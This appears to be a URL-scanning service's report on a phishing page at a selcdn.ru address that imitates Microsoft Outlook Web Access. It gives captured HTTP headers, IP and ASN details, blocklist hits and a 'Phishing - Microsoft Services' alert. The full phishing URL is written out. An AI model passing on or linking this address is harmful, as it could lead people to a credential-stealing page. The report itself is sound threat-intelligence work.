GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F79631135-a10c-43bf-85d2-fa2236b96883.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 058d798963f83f5fb88ab728185f755c5353fa981d93e1b6ff869089f501586b 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 13213 x-amzn-requestid: fe9ec409-2757-4910-8443-5b4d3be7efd3 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZFlATEp8oAMFd9Q= x-content-type-options: nosniff x-amzn-trace-id: Root=1-63321b9b-3230e97a4fe34413285eb578;Sampled=0 x-amzn-remapped-date: Mon, 26 Sep 2022 21:37:31 GMT x-amz-cf-pop: SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: rV80hKsopWPf_A8hKw0kwTOjVN4Bq-5f8oXDP2wluyGwof5yXFe2Bw== via: 1.1 c7c3cdef911c9ee3c1a83a78f425dc5a.cloudfront.net (CloudFront), 1.1 0d4ebcaa87ba94709def0eaac9371e5a.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 21:43:06 GMT age: 30 etag: "3d4fa8701f17e8818c25584ef5f04bfbee8440cd" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 13213 Md5: 62e68c3cd08dd94d910507512a67e85f Sha1: 3d4fa8701f17e8818c25584ef5f04bfbee8440cd Sha256: 058d798963f83f5fb88ab728185f755c5353fa981d93e1b6ff869089f501586b
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8ffa6dde-b51e-43f8-bfcb-3f442d674928.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 3839df92f0a10c1433d5b576df50c9f7953912ae4f425012262f08ee8a59ce2e 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 8500 x-amzn-requestid: af82c8d6-950c-4933-87e3-7bbb15cb1ac8 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZI3e3HOaoAMFoPQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-63336c5e-77e0ecc522de575e40f429b3;Sampled=0 x-amzn-remapped-date: Tue, 27 Sep 2022 21:34:22 GMT x-amz-cf-pop: HIO50-C1, SEA73-P1 x-cache: Miss from cloudfront x-amz-cf-id: rD5LsVDLQkaomG1nCGZGihbdlWKMCjUYNC2kRyAjJesJEOEBSj8Q3A== via: 1.1 5ab5dc09da67e3ea794ec8a82992cc88.cloudfront.net (CloudFront), 1.1 0d4ebcaa87ba94709def0eaac9371e5a.cloudfront.net (CloudFront), 1.1 google date: Tue, 27 Sep 2022 21:47:03 GMT age: 86193 etag: "9c4692ea64832895fbd107d91f879728b6a440c7" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 8500 Md5: 6139c878a7d2bd32c61fc8287996eb5b Sha1: 9c4692ea64832895fbd107d91f879728b6a440c7 Sha256: 3839df92f0a10c1433d5b576df50c9f7953912ae4f425012262f08ee8a59ce2e
GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1 Host: maxcdn.bootstrapcdn.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://673925.selcdn.ru/ Sec-Fetch-Dest: style Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.m (...) FQDN: maxcdn.bootstrapcdn.com IP: 104.18.11.207 104.18.11.207 HTTP/2 200 OK content-type: text/css; charset=utf-8 date: Wed, 28 Sep 2022 21:43:33 GMT vary: Accept-Encoding cdn-pullzone: 252412 cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74 cdn-requestcountrycode: SE cdn-edgestorageid: 632, 617, 617 last-modified: Mon, 25 Jan 2021 22:03:59 GMT cdn-cachedat: 2021-04-23 06:29:02 cdn-requestpullsuccess: True cdn-requestpullcode: 200 cache-control: public, max-age=31919000 timing-allow-origin: * cross-origin-resource-policy: cross-origin access-control-allow-origin: * x-content-type-options: nosniff cdn-requestid: 6a91d2c867066733b6d92a7a528c5c2e cdn-cache: HIT cf-cache-status: HIT age: 12511750 strict-transport-security: max-age=31536000; includeSubDomains; preload server: cloudflare cf-ray: 751fa7c4ac8ab4ed-OSL content-encoding: br alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info ---
GET /bootstrap/3.3.7/js/bootstrap.min.js HTTP/1.1 Host: maxcdn.bootstrapcdn.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://673925.selcdn.ru Connection: keep-alive Referer: http://673925.selcdn.ru/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js FQDN: maxcdn.bootstrapcdn.com IP: 104.18.11.207 104.18.11.207 HTTP/2 200 OK content-type: application/javascript; charset=utf-8 date: Wed, 28 Sep 2022 21:43:33 GMT vary: Accept-Encoding cdn-pullzone: 252412 cdn-uid: b1941f61-b576-4f40-80de-5677acb38f74 cdn-requestcountrycode: DE access-control-allow-origin: * cache-control: public, max-age=31919000 etag: W/"5869c96cc8f19086aee625d670d741f9" last-modified: Mon, 25 Jan 2021 22:04:00 GMT cdn-cachedat: 08/20/2022 02:31:21 cdn-proxyver: 1.02 cdn-requestpullcode: 200 cdn-requestpullsuccess: True cdn-edgestorageid: 756 cdn-status: 200 timing-allow-origin: * cross-origin-resource-policy: cross-origin x-content-type-options: nosniff cdn-requestid: 4844df07c8ab0d557d87889b86a5da4c cdn-cache: HIT cf-cache-status: HIT age: 56052 strict-transport-security: max-age=31536000; includeSubDomains; preload server: cloudflare cf-ray: 751fa7c4b89cb50c-OSL content-encoding: br alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info ---

URL	673925.selcdn.ru/owas444o44/334owa.authentic/new.html/
IP	92.53.68.203 (Russia)
ASN	#49505 OOO Network of data-centers Selectel
UserAgent	Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed	2022-09-28 21:43:44 UTC
Status	Loading report..
IDS alerts	0
Blocklist alert	2
urlquery alerts	1 Phishing - Microsoft Services
Tags	None

Overview

Domain Summary (13)

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 92.53.68.203

Last 5 reports on ASN: OOO Network of data-centers Selectel

Last 5 reports on domain: selcdn.ru

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (7)

Executed Evals (0)

Executed Writes (1)

#1 JavaScript::Write (size: 45751) - SHA256: 0a8a4f5b64f6500f9cbb3d139b416e783f34319f083de121a0db1d68d324eeba

HTTP Transactions (36)

Overview

Domain Summary (13)

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 92.53.68.203

Last 5 reports on ASN: OOO Network of data-centers Selectel

Last 5 reports on domain: selcdn.ru

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (7)

Executed Evals (0)

Executed Writes (1)

#1 JavaScript::Write (size: 45751) - SHA256: 0a8a4f5b64f6500f9cbb3d139b416e783f34319f083de121a0db1d68d324eeba

HTTP Transactions (36)

Network Intrusion Detection Systems